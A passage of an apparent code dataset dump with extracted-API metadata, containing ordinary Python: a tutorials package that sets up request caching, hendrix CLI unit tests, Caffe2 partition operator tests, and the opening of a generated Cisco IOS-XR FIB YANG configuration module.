1416), 'cinder.tests.unit.fake_volume.fake_volume_obj', 'fake_volume.fake_volume_obj', (['ctx'], {}), \"(ctx, **{'provider_id': fake.PROVIDER_ID})\\n\", (1374, 1416), False, 'from cinder.tests.unit import fake_volume\\n'), ((2211, 2299), 'cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse', 'mocks.MockHTTPSResponse', ([\"{'errorCode': 401, 'message': 'BadStatus Volume Test'}\", '(401)'], {}), \"({'errorCode': 401, 'message':\\n 'BadStatus Volume Test'}, 401)\\n\", (2234, 2299), False, 'from cinder.tests.unit.volume.drivers.emc.scaleio import mocks\\n'), ((2536, 2624), 'cinder.tests.unit.volume.drivers.emc.scaleio.mocks.MockHTTPSResponse', 'mocks.MockHTTPSResponse', ([\"{'errorCode': 401, 'message': 'BadStatus Volume Test'}\", '(401)'], {}), \"({'errorCode': 401, 'message':\\n 'BadStatus Volume Test'}, 401)\\n\", (2559, 2624), False, 'from cinder.tests.unit.volume.drivers.emc.scaleio import mocks\\n')]"}}},{"rowIdx":766,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\n__version__ = '1.0.2'\n\nimport os\nimport appdirs\nimport osmnx as ox\nimport joblib\nimport requests\nfrom .files import load_vars, save_vars, cached, inflate_tar, download_zipfile\nfrom .data import data, list_data, problematic\nfrom .tools.view_code import show_file\nfrom . import mapping\n\ncache_dir = None\nmemory = None\n\n\ndef set_cache_dir(location=None, compress=True, verbose=0, **kwargs):\n\t\"\"\"\n\tSet up a cache directory for use with the tutorials.\n\n\tParameter\n\t---------\n\tcache_dir : Path-like or False, optional\n\t\tA path for the cache files. Set to False to disable caching.\n\t\"\"\"\n\tglobal memory, cache_dir\n\n\tif location is None:\n\t\tlocation = appdirs.user_cache_dir('transportation_tutorials')\n\n\tif location is False:\n\t\tlocation = None\n\n\tmemory = joblib.Memory(location, compress=compress, verbose=verbose, **kwargs)\n\n\tmake_cache = (\n\t\t(ox, 'gdf_from_place'),\n\t\t(ox, 'graph_from_bbox'),\n\t\t(requests, 'get'),\n\t\t(requests, 'post'),\n\t)\n\n\tfor module, func_name in make_cache:\n\t\ttry:\n\t\t\tfunc = getattr(module, f\"_{func_name}_orig\")\n\t\texcept AttributeError:\n\t\t\tfunc = getattr(module, func_name)\n\t\t\tsetattr(module, f\"_{func_name}_orig\", func)\n\t\tsetattr(module, func_name, memory.cache(func))\n\n\n\n\n\nset_cache_dir()\n\n\n"},"apis":{"kind":"list like","value":["joblib.Memory","appdirs.user_cache_dir"],"string":"[\n \"joblib.Memory\",\n \"appdirs.user_cache_dir\"\n]"},"extract_api":{"kind":"string","value":"[((772, 841), 'joblib.Memory', 'joblib.Memory', (['location'], {'compress': 'compress', 'verbose': 'verbose'}), '(location, compress=compress, verbose=verbose, **kwargs)\\n', (785, 841), False, 'import joblib\\n'), ((668, 718), 'appdirs.user_cache_dir', 'appdirs.user_cache_dir', (['\"\"\"transportation_tutorials\"\"\"'], {}), \"('transportation_tutorials')\\n\", (690, 718), False, 'import appdirs\\n')]"}}},{"rowIdx":767,"cells":{"code":{"kind":"string","value":"import os\nimport sys\nfrom . import HendrixTestCase, TEST_SETTINGS\nfrom hendrix.contrib import SettingsError\nfrom hendrix.options import options as hx_options\nfrom hendrix import ux\nfrom mock import patch\n\n\nclass TestMain(HendrixTestCase):\n\n def setUp(self):\n super(TestMain, self).setUp()\n self.DEFAULTS = hx_options()\n os.environ['DJANGO_SETTINGS_MODULE'] = ''\n self.devnull = open(os.devnull, 'w')\n self.args_list = ['hx', 'start']\n self.patcher = patch('hendrix.ux.findSettingsModule')\n self.patcher.start()\n\n def tearDown(self):\n super(TestMain, self).tearDown()\n self.devnull.close()\n self.patcher.stop()\n\n def test_settings_from_system_variable(self):\n django_settings = 'django.inanity'\n with patch('hendrix.ux.findSettingsModule') as findSettingsMod:\n findSettingsMod.return_value = django_settings\n options = self.DEFAULTS\n self.assertEqual(options['settings'], '')\n options = ux.djangoVsWsgi(options)\n self.assertEqual(options['settings'], django_settings)\n\n def test_settings_wsgi_absense(self):\n with patch('hendrix.ux.findSettingsModule') as findSettingsMod:\n findSettingsMod.return_value = \"\"\n self.assertRaises(SettingsError, ux.djangoVsWsgi, self.DEFAULTS)\n\n def test_user_settings_overrides_system_variable(self):\n django_settings = 'django.inanity'\n with patch('hendrix.ux.findSettingsModule') as findSettingsMod:\n findSettingsMod.return_value = django_settings\n options = self.DEFAULTS\n user_settings = 'myproject.settings'\n options['settings'] = user_settings\n self.assertEqual(options['settings'], user_settings)\n options = ux.djangoVsWsgi(options)\n self.assertEqual(options['settings'], user_settings)\n\n def test_wsgi_correct_wsgi_path_works(self):\n wsgi_dot_path = 'hendrix.test.wsgi'\n options = self.DEFAULTS\n options.update({'wsgi': wsgi_dot_path})\n options = ux.djangoVsWsgi(options)\n self.assertEqual(options['wsgi'], wsgi_dot_path)\n\n def test_wsgi_wrong_path_raises(self):\n wsgi_dot_path = '_this.leads.nowhere.man'\n options = self.DEFAULTS\n options.update({'wsgi': wsgi_dot_path})\n\n self.assertRaises(ImportError, ux.djangoVsWsgi, options)\n\n def test_cwd_exposure(self):\n cwd = os.getcwd()\n _path = sys.path\n sys.path = [p for p in _path if p != cwd]\n self.assertTrue(cwd not in sys.path)\n ux.exposeProject(self.DEFAULTS)\n self.assertTrue(cwd in sys.path)\n\n def test_pythonpath(self):\n options = self.DEFAULTS\n test_path = os.path.join(\n os.path.dirname(os.getcwd()),\n 'hendrix/test/testproject'\n )\n options['pythonpath'] = test_path\n ux.exposeProject(options)\n self.assertTrue(test_path in sys.path)\n sys.path = [p for p in sys.path if p != test_path]\n\n def test_shitty_pythonpath(self):\n options = self.DEFAULTS\n test_path = '/if/u/have/this/path/you/suck'\n options['pythonpath'] = test_path\n self.assertRaises(IOError, ux.exposeProject, options)\n\n def test_dev_friendly_options(self):\n options = self.DEFAULTS\n options['dev'] = True\n self.assertFalse(options['reload'])\n self.assertFalse(options['loud'])\n options = ux.devFriendly(options)\n self.assertTrue(options['reload'])\n self.assertTrue(options['loud'])\n\n def test_noise_control_daemonize(self):\n options = self.DEFAULTS\n options['quiet'] = True\n options['daemonize'] = True\n stdout = sys.stdout\n stderr = sys.stderr\n redirect = ux.noiseControl(options)\n self.assertEqual(sys.stdout.name, stdout.name)\n self.assertEqual(sys.stderr.name, stderr.name)\n\n self.assertEqual(redirect, None)\n\n def test_noise_control_traceback(self):\n options = self.DEFAULTS\n options['quiet'] = True\n options['daemonize'] = True\n options['traceback'] = True\n stdout = sys.stdout\n stderr = sys.stderr\n redirect = ux.noiseControl(options)\n self.assertEqual(sys.stdout.name, stdout.name)\n self.assertEqual(sys.stderr.name, stderr.name)\n\n self.assertEqual(redirect, None)\n\n def test_main_with_daemonize(self):\n sys.argv = self.args_list + ['-d', '--settings', TEST_SETTINGS]\n\n class Process(object):\n def poll(self):\n return 0\n with patch('time.sleep'):\n with patch('subprocess.Popen') as popen:\n popen.return_value = Process()\n ux.main()\n self.assertTrue(popen.called)\n self.assertTrue('--settings' in popen.call_args[0][0])\n sys.argv = []\n\n def test_options_structure(self):\n \"\"\"\n A test to ensure that HendrixDeploy.options also has the complete set\n of options available\n \"\"\"\n deploy = self.wsgiDeploy()\n expected_keys = self.DEFAULTS.keys()\n actual_keys = deploy.options.keys()\n self.assertListEqual(expected_keys, actual_keys)\n"},"apis":{"kind":"list like","value":["hendrix.options.options","mock.patch","hendrix.ux.noiseControl","hendrix.ux.djangoVsWsgi","os.getcwd","hendrix.ux.main","hendrix.ux.devFriendly","hendrix.ux.exposeProject"],"string":"[\n \"hendrix.options.options\",\n \"mock.patch\",\n \"hendrix.ux.noiseControl\",\n \"hendrix.ux.djangoVsWsgi\",\n \"os.getcwd\",\n \"hendrix.ux.main\",\n \"hendrix.ux.devFriendly\",\n \"hendrix.ux.exposeProject\"\n]"},"extract_api":{"kind":"string","value":"[((323, 335), 'hendrix.options.options', 'hx_options', ([], {}), '()\\n', (333, 335), True, 'from hendrix.options import options as hx_options\\n'), ((495, 533), 'mock.patch', 'patch', (['\"\"\"hendrix.ux.findSettingsModule\"\"\"'], {}), \"('hendrix.ux.findSettingsModule')\\n\", (500, 533), False, 'from mock import patch\\n'), ((2090, 2114), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\\n', (2105, 2114), False, 'from hendrix import ux\\n'), ((2460, 2471), 'os.getcwd', 'os.getcwd', ([], {}), '()\\n', (2469, 2471), False, 'import os\\n'), ((2600, 2631), 'hendrix.ux.exposeProject', 'ux.exposeProject', (['self.DEFAULTS'], {}), '(self.DEFAULTS)\\n', (2616, 2631), False, 'from hendrix import ux\\n'), ((2912, 2937), 'hendrix.ux.exposeProject', 'ux.exposeProject', (['options'], {}), '(options)\\n', (2928, 2937), False, 'from hendrix import ux\\n'), ((3479, 3502), 'hendrix.ux.devFriendly', 'ux.devFriendly', (['options'], {}), '(options)\\n', (3493, 3502), False, 'from hendrix import ux\\n'), ((3807, 3831), 'hendrix.ux.noiseControl', 'ux.noiseControl', (['options'], {}), '(options)\\n', (3822, 3831), False, 'from hendrix import ux\\n'), ((4240, 4264), 'hendrix.ux.noiseControl', 'ux.noiseControl', (['options'], {}), '(options)\\n', (4255, 4264), False, 'from hendrix import ux\\n'), ((793, 831), 'mock.patch', 'patch', (['\"\"\"hendrix.ux.findSettingsModule\"\"\"'], {}), \"('hendrix.ux.findSettingsModule')\\n\", (798, 831), False, 'from mock import patch\\n'), ((1023, 1047), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\\n', (1038, 1047), False, 'from hendrix import ux\\n'), ((1171, 1209), 'mock.patch', 'patch', (['\"\"\"hendrix.ux.findSettingsModule\"\"\"'], {}), \"('hendrix.ux.findSettingsModule')\\n\", (1176, 1209), False, 'from mock import patch\\n'), ((1470, 1508), 'mock.patch', 'patch', (['\"\"\"hendrix.ux.findSettingsModule\"\"\"'], {}), \"('hendrix.ux.findSettingsModule')\\n\", (1475, 1508), False, 'from mock import patch\\n'), ((1808, 1832), 'hendrix.ux.djangoVsWsgi', 'ux.djangoVsWsgi', (['options'], {}), '(options)\\n', (1823, 1832), False, 'from hendrix import ux\\n'), ((4628, 4647), 'mock.patch', 'patch', (['\"\"\"time.sleep\"\"\"'], {}), \"('time.sleep')\\n\", (4633, 4647), False, 'from mock import patch\\n'), ((2799, 2810), 'os.getcwd', 'os.getcwd', ([], {}), '()\\n', (2808, 2810), False, 'import os\\n'), ((4666, 4691), 'mock.patch', 'patch', (['\"\"\"subprocess.Popen\"\"\"'], {}), \"('subprocess.Popen')\\n\", (4671, 4691), False, 'from mock import patch\\n'), ((4765, 4774), 'hendrix.ux.main', 'ux.main', ([], {}), '()\\n', (4772, 4774), False, 'from hendrix import ux\\n')]"}}},{"rowIdx":768,"cells":{"code":{"kind":"string","value":"# Copyright (c) 2016-present, Facebook, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##############################################################################\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport numpy as np\nfrom caffe2.python import core, workspace\nfrom caffe2.python.test_util import TestCase, rand_array\n\n\nclass TestPartitionOps(TestCase):\n\n def test_configs(self):\n # (main dims, partitions, main type, [list of (extra dims, type)])\n configs = [\n ((10, ), 3),\n ((4, ), 10),\n ((10, 10), 4),\n ((100, ), 2),\n ((5, ), 1),\n ((1, ), 1),\n ((2, 10), 2),\n ]\n suffixes = [\n [],\n [((2, 2), np.float32)],\n [((3, ), np.int64), ((2, ), np.float32)],\n ]\n return [\n (main_dims, parts, main_type, extra, pack)\n for main_dims, parts in configs\n for main_type in [np.int32, np.int64] for extra in suffixes\n for pack in [False, True]\n ]\n\n def testPartition(self):\n for main_dims, parts, main_type, extra_ins, pack in self.test_configs():\n ins = ['in' + str(i) for i in range(1 + len(extra_ins))]\n outs = [\n 'in{}_p{}'.format(j, i)\n for i in range(parts) for j in range(1 + len(extra_ins))\n ]\n op = core.CreateOperator(\n 'Partition', ins, outs, pack_first_input=(1 if pack else 0))\n x = []\n for i, (dims, t) in enumerate([((), main_type)] + extra_ins):\n if t in [np.float32, np.float64]:\n d = rand_array(*(main_dims + dims))\n else:\n d = np.random.randint(-100, 100, (main_dims + dims))\n d = d.astype(t)\n workspace.FeedBlob(ins[i], d)\n x.append(d)\n\n def sharding(x):\n # numpy has proper modulo op that yields non-negative results\n shards = (x[0] % parts).reshape([-1])\n out = []\n for i in range(parts):\n for ind, v in enumerate(x):\n suffix_shape = v.shape[len(x[0].shape):]\n accum = []\n data = v.reshape((-1, ) + suffix_shape)\n\n if pack and ind == 0:\n data = data // parts\n\n for j, s in enumerate(shards):\n if s == i:\n accum.append(data[j])\n\n def join(a):\n if not a:\n return np.empty(shape=(0, ) + suffix_shape)\n return np.stack(a)\n\n out.append(join(accum))\n return out\n\n workspace.RunOperatorOnce(op)\n ref = sharding(x)\n print(x)\n print(ref)\n for name, expected in zip(outs, ref):\n np.testing.assert_array_equal(\n expected, workspace.FetchBlob(name)\n )\n\n # test inverse operation (GatherByKey)\n if len(main_dims) == 1:\n # currently only 1D key tensor supported\n for i in range(len(extra_ins)):\n expected_out = ins[i + 1]\n gather_ins = [ins[0]] + [\n outs[len(ins) * p + i + 1] for p in range(parts)]\n actual_out = expected_out + '_actual'\n op = core.CreateOperator(\n 'GatherByKey', gather_ins, actual_out)\n workspace.RunOperatorOnce(op)\n expected = workspace.FetchBlob(expected_out)\n actual = workspace.FetchBlob(actual_out)\n np.testing.assert_array_equal(expected, actual)\n\n\n def testLengthsPartition(self):\n for main_dims, parts, main_type, extra_ins, pack in self.test_configs():\n # For LengthsSharding only 1-D tensors supported as a first input\n if len(main_dims) > 1:\n continue\n ins = ['in' + str(i) for i in range(2 + len(extra_ins))]\n outs = [\n 'in{}_p{}'.format(j, i)\n for i in range(parts) for j in range(2 + len(extra_ins))\n ]\n op = core.CreateOperator(\n 'LengthsPartition', ins, outs,\n pack_first_input=(1 if pack else 0)\n )\n x = []\n for i, (dims, t) in enumerate([((), main_type)] + extra_ins):\n if t in [np.float32, np.float64]:\n d = rand_array(*(main_dims + dims))\n else:\n d = np.random.randint(-100, 100, (main_dims + dims))\n d = d.astype(t)\n workspace.FeedBlob(ins[i + 1], d)\n x.append(d)\n\n # Randomly generate length tensor as well\n elements = np.random.randint(2, 10)\n lengths = []\n total_length = 0\n for _ in range(elements - 1):\n lengths.append(np.random.randint(main_dims[0] - total_length))\n total_length += lengths[-1]\n lengths.append(main_dims[0] - total_length)\n workspace.FeedBlob(ins[0], np.array(lengths, dtype=np.int32))\n\n def sharding(x):\n # numpy has proper modulo op that yields non-negative results\n shards = (x[0] % parts).reshape([-1])\n out = []\n for i in range(parts):\n idx = 0\n sharded_lengths = np.zeros(elements)\n for ind, length in enumerate(lengths):\n for _ in range(length):\n if shards[idx] == i:\n sharded_lengths[ind] += 1\n idx += 1\n out.append(sharded_lengths)\n\n for ind, v in enumerate(x):\n suffix_shape = v.shape[len(x[0].shape):]\n accum = []\n data = v.reshape((-1, ) + suffix_shape)\n\n if pack and ind == 0:\n data = data // parts\n\n for j, s in enumerate(shards):\n if s == i:\n accum.append(data[j])\n\n def join(a):\n if not a:\n return np.empty(shape=(0, ) + suffix_shape)\n return np.stack(a)\n\n out.append(join(accum))\n return out\n\n workspace.RunOperatorOnce(op)\n ref = sharding(x)\n for name, expected in zip(outs, ref):\n np.testing.assert_array_equal(\n expected, workspace.FetchBlob(name)\n )\n\nif __name__ == \"__main__\":\n import unittest\n unittest.main()\n"},"apis":{"kind":"list like","value":["caffe2.python.test_util.rand_array","caffe2.python.workspace.RunOperatorOnce","caffe2.python.workspace.FetchBlob","numpy.array","numpy.random.randint","numpy.zeros","numpy.stack","numpy.empty","caffe2.python.core.CreateOperator","unittest.main","numpy.testing.assert_array_equal","caffe2.python.workspace.FeedBlob"],"string":"[\n \"caffe2.python.test_util.rand_array\",\n \"caffe2.python.workspace.RunOperatorOnce\",\n \"caffe2.python.workspace.FetchBlob\",\n \"numpy.array\",\n \"numpy.random.randint\",\n \"numpy.zeros\",\n \"numpy.stack\",\n \"numpy.empty\",\n \"caffe2.python.core.CreateOperator\",\n \"unittest.main\",\n \"numpy.testing.assert_array_equal\",\n \"caffe2.python.workspace.FeedBlob\"\n]"},"extract_api":{"kind":"string","value":"[((7638, 7653), 'unittest.main', 'unittest.main', ([], {}), '()\\n', (7651, 7653), False, 'import unittest\\n'), ((2004, 2082), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['\"\"\"Partition\"\"\"', 'ins', 'outs'], {'pack_first_input': '(1 if pack else 0)'}), \"('Partition', ins, outs, pack_first_input=1 if pack else 0)\\n\", (2023, 2082), False, 'from caffe2.python import core, workspace\\n'), ((3473, 3502), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\\n', (3498, 3502), False, 'from caffe2.python import core, workspace\\n'), ((5009, 5098), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['\"\"\"LengthsPartition\"\"\"', 'ins', 'outs'], {'pack_first_input': '(1 if pack else 0)'}), \"('LengthsPartition', ins, outs, pack_first_input=1 if\\n pack else 0)\\n\", (5028, 5098), False, 'from caffe2.python import core, workspace\\n'), ((5625, 5649), 'numpy.random.randint', 'np.random.randint', (['(2)', '(10)'], {}), '(2, 10)\\n', (5642, 5649), True, 'import numpy as np\\n'), ((7355, 7384), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\\n', (7380, 7384), False, 'from caffe2.python import core, workspace\\n'), ((2444, 2473), 'caffe2.python.workspace.FeedBlob', 'workspace.FeedBlob', (['ins[i]', 'd'], {}), '(ins[i], d)\\n', (2462, 2473), False, 'from caffe2.python import core, workspace\\n'), ((5485, 5518), 'caffe2.python.workspace.FeedBlob', 'workspace.FeedBlob', (['ins[i + 1]', 'd'], {}), '(ins[i + 1], d)\\n', (5503, 5518), False, 'from caffe2.python import core, workspace\\n'), ((5964, 5997), 'numpy.array', 'np.array', (['lengths'], {'dtype': 'np.int32'}), '(lengths, dtype=np.int32)\\n', (5972, 5997), True, 'import numpy as np\\n'), ((2269, 2300), 'caffe2.python.test_util.rand_array', 'rand_array', (['*(main_dims + dims)'], {}), '(*(main_dims + dims))\\n', (2279, 2300), False, 'from caffe2.python.test_util import TestCase, rand_array\\n'), ((2347, 2393), 'numpy.random.randint', 'np.random.randint', (['(-100)', '(100)', '(main_dims + dims)'], {}), '(-100, 100, main_dims + dims)\\n', (2364, 2393), True, 'import numpy as np\\n'), ((3704, 3729), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['name'], {}), '(name)\\n', (3723, 3729), False, 'from caffe2.python import core, workspace\\n'), ((4190, 4248), 'caffe2.python.core.CreateOperator', 'core.CreateOperator', (['\"\"\"GatherByKey\"\"\"', 'gather_ins', 'actual_out'], {}), \"('GatherByKey', gather_ins, actual_out)\\n\", (4209, 4248), False, 'from caffe2.python import core, workspace\\n'), ((4294, 4323), 'caffe2.python.workspace.RunOperatorOnce', 'workspace.RunOperatorOnce', (['op'], {}), '(op)\\n', (4319, 4323), False, 'from caffe2.python import core, workspace\\n'), ((4355, 4388), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['expected_out'], {}), '(expected_out)\\n', (4374, 4388), False, 'from caffe2.python import core, workspace\\n'), ((4418, 4449), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['actual_out'], {}), '(actual_out)\\n', (4437, 4449), False, 'from caffe2.python import core, workspace\\n'), ((4470, 4517), 'numpy.testing.assert_array_equal', 'np.testing.assert_array_equal', (['expected', 'actual'], {}), '(expected, actual)\\n', (4499, 4517), True, 'import numpy as np\\n'), ((5310, 5341), 'caffe2.python.test_util.rand_array', 'rand_array', (['*(main_dims + dims)'], {}), '(*(main_dims + dims))\\n', (5320, 5341), False, 'from caffe2.python.test_util import TestCase, rand_array\\n'), ((5388, 5434), 'numpy.random.randint', 'np.random.randint', (['(-100)', '(100)', '(main_dims + dims)'], {}), '(-100, 100, main_dims + dims)\\n', (5405, 5434), True, 'import numpy as np\\n'), ((5777, 5823), 'numpy.random.randint', 'np.random.randint', (['(main_dims[0] - total_length)'], {}), '(main_dims[0] - total_length)\\n', (5794, 5823), True, 'import numpy as np\\n'), ((6291, 6309), 'numpy.zeros', 'np.zeros', (['elements'], {}), '(elements)\\n', (6299, 6309), True, 'import numpy as np\\n'), ((7542, 7567), 'caffe2.python.workspace.FetchBlob', 'workspace.FetchBlob', (['name'], {}), '(name)\\n', (7561, 7567), False, 'from caffe2.python import core, workspace\\n'), ((3372, 3383), 'numpy.stack', 'np.stack', (['a'], {}), '(a)\\n', (3380, 3383), True, 'import numpy as np\\n'), ((7254, 7265), 'numpy.stack', 'np.stack', (['a'], {}), '(a)\\n', (7262, 7265), True, 'import numpy as np\\n'), ((3300, 3335), 'numpy.empty', 'np.empty', ([], {'shape': '((0,) + suffix_shape)'}), '(shape=(0,) + suffix_shape)\\n', (3308, 3335), True, 'import numpy as np\\n'), ((7182, 7217), 'numpy.empty', 'np.empty', ([], {'shape': '((0,) + suffix_shape)'}), '(shape=(0,) + suffix_shape)\\n', (7190, 7217), True, 'import numpy as np\\n')]"}}},{"rowIdx":769,"cells":{"code":{"kind":"string","value":"\"\"\" Cisco_IOS_XR_fib_common_cfg \n\nThis module contains a collection of YANG definitions\nfor Cisco IOS\\-XR fib\\-common package configuration.\n\nThis module contains definitions\nfor the following management objects\\:\n fib\\: CEF configuration\n\nCopyright (c) 2013\\-2018 by Cisco Systems, Inc.\nAll rights reserved.\n\n\"\"\"\nfrom collections import OrderedDict\n\nfrom ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\nfrom ydk.filters import YFilter\nfrom ydk.errors import YError, YModelError\nfrom ydk.errors.error_handler import handle_type_error as _handle_type_error\n\n\n\nclass FibPbtsFallback(Enum):\n \"\"\"\n FibPbtsFallback (Enum Class)\n\n Fib pbts fallback\n\n .. data:: list = 1\n\n \tFallback to class number list\n\n .. data:: any = 2\n\n \tFallback to any class\n\n .. data:: drop = 3\n\n \tFallback to drop\n\n \"\"\"\n\n list = Enum.YLeaf(1, \"list\")\n\n any = Enum.YLeaf(2, \"any\")\n\n drop = Enum.YLeaf(3, \"drop\")\n\n\nclass FibPbtsForwardClass(Enum):\n \"\"\"\n FibPbtsForwardClass (Enum Class)\n\n Fib pbts forward class\n\n .. data:: any = 8\n\n \tAny class\n\n \"\"\"\n\n any = Enum.YLeaf(8, \"any\")\n\n\n\nclass Fib(Entity):\n \"\"\"\n CEF configuration\n \n .. attribute:: pbts_forward_class_fallbacks\n \n \tPBTS class configuration\n \t**type**\\: :py:class:`PbtsForwardClassFallbacks `\n \n .. attribute:: platform\n \n \tFIB platform parameters\n \t**type**\\: :py:class:`Platform `\n \n .. attribute:: auto_hash_recover\n \n \tSet option for automatcially recovering consistent\\-hashing state on interface up\n \t**type**\\: bool\n \n .. attribute:: prefer_aib_routes\n \n \tSet options for adjacency routes overriding RIB routes\n \t**type**\\: bool\n \n .. attribute:: encap_sharing_disable\n \n \tSet true to disable encapsulation sharing\n \t**type**\\: bool\n \n .. attribute:: frr_follow_bgp_pic\n \n \tSet option for fast\\-reroute to follow BGP PIC update, not to wait for timeout\n \t**type**\\: bool\n \n \n\n \"\"\"\n\n _prefix = 'fib-common-cfg'\n _revision = '2017-05-01'\n\n def __init__(self):\n super(Fib, self).__init__()\n self._top_entity = None\n\n self.yang_name = \"fib\"\n self.yang_parent_name = \"Cisco-IOS-XR-fib-common-cfg\"\n self.is_top_level_class = True\n self.has_list_ancestor = False\n self.ylist_key_names = []\n self._child_classes = OrderedDict([(\"pbts-forward-class-fallbacks\", (\"pbts_forward_class_fallbacks\", Fib.PbtsForwardClassFallbacks)), (\"platform\", (\"platform\", Fib.Platform))])\n self._leafs = OrderedDict([\n ('auto_hash_recover', (YLeaf(YType.boolean, 'auto-hash-recover'), ['bool'])),\n ('prefer_aib_routes', (YLeaf(YType.boolean, 'prefer-aib-routes'), ['bool'])),\n ('encap_sharing_disable', (YLeaf(YType.boolean, 'encap-sharing-disable'), ['bool'])),\n ('frr_follow_bgp_pic', (YLeaf(YType.boolean, 'frr-follow-bgp-pic'), ['bool'])),\n ])\n self.auto_hash_recover = None\n self.prefer_aib_routes = None\n self.encap_sharing_disable = None\n self.frr_follow_bgp_pic = None\n\n self.pbts_forward_class_fallbacks = Fib.PbtsForwardClassFallbacks()\n self.pbts_forward_class_fallbacks.parent = self\n self._children_name_map[\"pbts_forward_class_fallbacks\"] = \"pbts-forward-class-fallbacks\"\n\n self.platform = Fib.Platform()\n self.platform.parent = self\n self._children_name_map[\"platform\"] = \"platform\"\n self._segment_path = lambda: \"Cisco-IOS-XR-fib-common-cfg:fib\"\n self._is_frozen = True\n\n def __setattr__(self, name, value):\n self._perform_setattr(Fib, ['auto_hash_recover', 'prefer_aib_routes', 'encap_sharing_disable', 'frr_follow_bgp_pic'], name, value)\n\n\n class PbtsForwardClassFallbacks(Entity):\n \"\"\"\n PBTS class configuration\n \n .. attribute:: pbts_forward_class_fallback\n \n \tSet PBTS class for fallback\n \t**type**\\: list of \t\t :py:class:`PbtsForwardClassFallback `\n \n \n\n \"\"\"\n\n _prefix = 'fib-common-cfg'\n _revision = '2017-05-01'\n\n def __init__(self):\n super(Fib.PbtsForwardClassFallbacks, self).__init__()\n\n self.yang_name = \"pbts-forward-class-fallbacks\"\n self.yang_parent_name = \"fib\"\n self.is_top_level_class = False\n self.has_list_ancestor = False\n self.ylist_key_names = []\n self._child_classes = OrderedDict([(\"pbts-forward-class-fallback\", (\"pbts_forward_class_fallback\", Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback))])\n self._leafs = OrderedDict()\n\n self.pbts_forward_class_fallback = YList(self)\n self._segment_path = lambda: \"pbts-forward-class-fallbacks\"\n self._absolute_path = lambda: \"Cisco-IOS-XR-fib-common-cfg:fib/%s\" % self._segment_path()\n self._is_frozen = True\n\n def __setattr__(self, name, value):\n self._perform_setattr(Fib.PbtsForwardClassFallbacks, [], name, value)\n\n\n class PbtsForwardClassFallback(Entity):\n \"\"\"\n Set PBTS class for fallback\n \n .. attribute:: forward_class_number (key)\n \n \tPBTS forward class number\n \t**type**\\: union of the below types:\n \n \t\t**type**\\: :py:class:`FibPbtsForwardClass `\n \n \t\t**type**\\: int\n \n \t\t\t**range:** 0..8\n \n .. attribute:: fallback_type\n \n \tSet PBTS fallback type\n \t**type**\\: :py:class:`FibPbtsFallback `\n \n \t**mandatory**\\: True\n \n .. attribute:: fallback_class_number_array\n \n \tSet PBTS fallback class number array\n \t**type**\\: list of int\n \n \t**range:** 0..7\n \n \n\n \"\"\"\n\n _prefix = 'fib-common-cfg'\n _revision = '2017-05-01'\n\n def __init__(self):\n super(Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback, self).__init__()\n\n self.yang_name = \"pbts-forward-class-fallback\"\n self.yang_parent_name = \"pbts-forward-class-fallbacks\"\n self.is_top_level_class = False\n self.has_list_ancestor = False\n self.ylist_key_names = ['forward_class_number']\n self._child_classes = OrderedDict([])\n self._leafs = OrderedDict([\n ('forward_class_number', (YLeaf(YType.str, 'forward-class-number'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg', 'FibPbtsForwardClass', ''),'int'])),\n ('fallback_type', (YLeaf(YType.enumeration, 'fallback-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_fib_common_cfg', 'FibPbtsFallback', '')])),\n ('fallback_class_number_array', (YLeafList(YType.uint32, 'fallback-class-number-array'), ['int'])),\n ])\n self.forward_class_number = None\n self.fallback_type = None\n self.fallback_class_number_array = []\n self._segment_path = lambda: \"pbts-forward-class-fallback\" + \"[forward-class-number='\" + str(self.forward_class_number) + \"']\"\n self._absolute_path = lambda: \"Cisco-IOS-XR-fib-common-cfg:fib/pbts-forward-class-fallbacks/%s\" % self._segment_path()\n self._is_frozen = True\n\n def __setattr__(self, name, value):\n self._perform_setattr(Fib.PbtsForwardClassFallbacks.PbtsForwardClassFallback, ['forward_class_number', 'fallback_type', 'fallback_class_number_array'], name, value)\n\n\n class Platform(Entity):\n \"\"\"\n FIB platform parameters\n \n .. attribute:: label_switched_multicast\n \n \tOptions for label\\-switched\\-multicast parameters\n \t**type**\\: :py:class:`LabelSwitchedMulticast `\n \n \n\n \"\"\"\n\n _prefix = 'fib-common-cfg'\n _revision = '2017-05-01'\n\n def __init__(self):\n super(Fib.Platform, self).__init__()\n\n self.yang_name = \"platform\"\n self.yang_parent_name = \"fib\"\n self.is_top_level_class = False\n self.has_list_ancestor = False\n self.ylist_key_names = []\n self._child_classes = OrderedDict([(\"label-switched-multicast\", (\"label_switched_multicast\", Fib.Platform.LabelSwitchedMulticast))])\n self._leafs = OrderedDict()\n\n self.label_switched_multicast = Fib.Platform.LabelSwitchedMulticast()\n self.label_switched_multicast.parent = self\n self._children_name_map[\"label_switched_multicast\"] = \"label-switched-multicast\"\n self._segment_path = lambda: \"platform\"\n self._absolute_path = lambda: 